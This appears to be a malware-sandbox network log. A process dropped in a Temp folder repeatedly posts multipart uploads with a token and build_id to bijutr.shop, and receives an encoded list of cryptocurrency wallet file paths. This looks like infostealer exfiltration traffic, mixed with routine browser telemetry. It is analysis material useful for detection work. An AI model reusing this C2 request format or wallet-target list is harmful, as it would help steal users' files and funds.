2024-12-27 06:10:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 49879 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:35 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EKNG4EUSR1N7YUA16890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:35 UTC | 16355 | OUT | Data Ascii:
------EKNG4EUSR1N7YUA16890
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------EKNG4EUSR1N7YUA16890
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------EKNG4EUSR1N7YUA16890
Cont
2024-12-27 06:10:37 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 49884 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:36 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----26FKFK6PZ58QIECJWLFK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:36 UTC | 16355 | OUT | Data Ascii:
------26FKFK6PZ58QIECJWLFK
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------26FKFK6PZ58QIECJWLFK
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------26FKFK6PZ58QIECJWLFK
Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 49877 | 23.209.72.21 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:38 UTC | 751 | OUT | GET /statics/icons/favicon_newtabpage.png HTTP/1.1
Host: assets.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
2024-12-27 06:10:38 UTC | 1003 | IN | HTTP/1.1 200 OK
Content-Type: image/png
ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
Server: AkamaiNetStorage
Date: Fri, 27 Dec 2024 06:10:38 GMT
Content-Length: 354
Connection: close
Alt-Svc: h3=":443"; ma=86400
Akamai-Request-BC: [a=23.210.4.135,b=1958601252,c=g,n=US_NJ_SECAUCUS,o=20940]
Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
Akamai-Cache-Status: Hit from child
Akamai-Server-IP: 23.210.4.135
Akamai-Request-ID: 74bde224
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Cache-Control: public, max-age=31536000
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
Timing-Allow-Origin: *
Akamai-GRN: 0.8704d217.1735279838.74bde224
Vary: Origin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 49894 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:39 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3OH479ZMGLN7QIMYUKFU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:39 UTC | 16355 | OUT | Data Ascii:
------3OH479ZMGLN7QIMYUKFU
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------3OH479ZMGLN7QIMYUKFU
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------3OH479ZMGLN7QIMYUKFU
Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:40 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 49902 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:40 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAIWTJM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:40 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74
Data Ascii: ------DTRQIEUAAI58YUAIWTJMContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------DTRQIEUAAI58YUAIWTJMContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------DTRQIEUAAI58YUAIWTJMCont
2024-12-27 06:10:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 49876 | 20.110.205.119 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:40 UTC | 1175 | OUT | GET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                      Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Location: https://c.bing.com/c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA9C2839891B4BAE9B46E9232B945869&RedC=c.msn.com&MXFR=309DCA2A26BF68F127E0DF4827176945
                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                      P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                      Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: MUID=309DCA2A26BF68F127E0DF4827176945; domain=.msn.com; expires=Wed, 21-Jan-2026 06:10:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:40 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 49881 | 18.238.49.74 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:40 UTC | 925 | OUT | GET /b?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:10:40 UTC | 955 | IN | HTTP/1.1 302 Found
Content-Length: 0
Connection: close
Date: Fri, 27 Dec 2024 06:10:40 GMT
Location: /b2?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
set-cookie: UID=10344ddb4a73bf8506bf1b41735279840; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
set-cookie: XID=10344ddb4a73bf8506bf1b41735279840; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 a410463cf33c032bf74ee26bf94b81b2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P3
X-Amz-Cf-Id: HTvYWzBrpEUBSLd2wEOFTY46hfuPo0zUPA_wtQzST5ncaGFsLYNPaQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 49905 | 18.238.49.74 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:42 UTC | 1012 | OUT | GET /b2?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: UID=10344ddb4a73bf8506bf1b41735279840; XID=10344ddb4a73bf8506bf1b41735279840
2024-12-27 06:10:42 UTC | 326 | IN | HTTP/1.1 204 No Content
Connection: close
Date: Fri, 27 Dec 2024 06:10:42 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 2e60669cf4a63082b5e4935391509354.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P3
X-Amz-Cf-Id: Lt2lE6RBqE4CMMLICN8dDJZ8JsFLLs1OM_6Ccjg4TDNVYSIjOO_3dQ==


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      36192.168.2.749911188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----0Z58G4WLNYCJE3OHVAS0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------0Z58G4WLNYCJE3OHVAS0Cont
2024-12-27 06:10:43 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:43 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:43 UTC | 2228 | IN
                                                                                                                                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 49903 | 51.104.15.253 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:42 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286739101&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 3868
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
2024-12-27 06:10:42 UTC | 3868 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T08:05:39.095Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
2024-12-27 06:10:43 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=4070a74da02c46bc85760b3f675148fa&HASH=4070&LV=202412&V=4&LU=1735279842698; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=a22c87c247db4f8eb81c9717e7098304; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896403
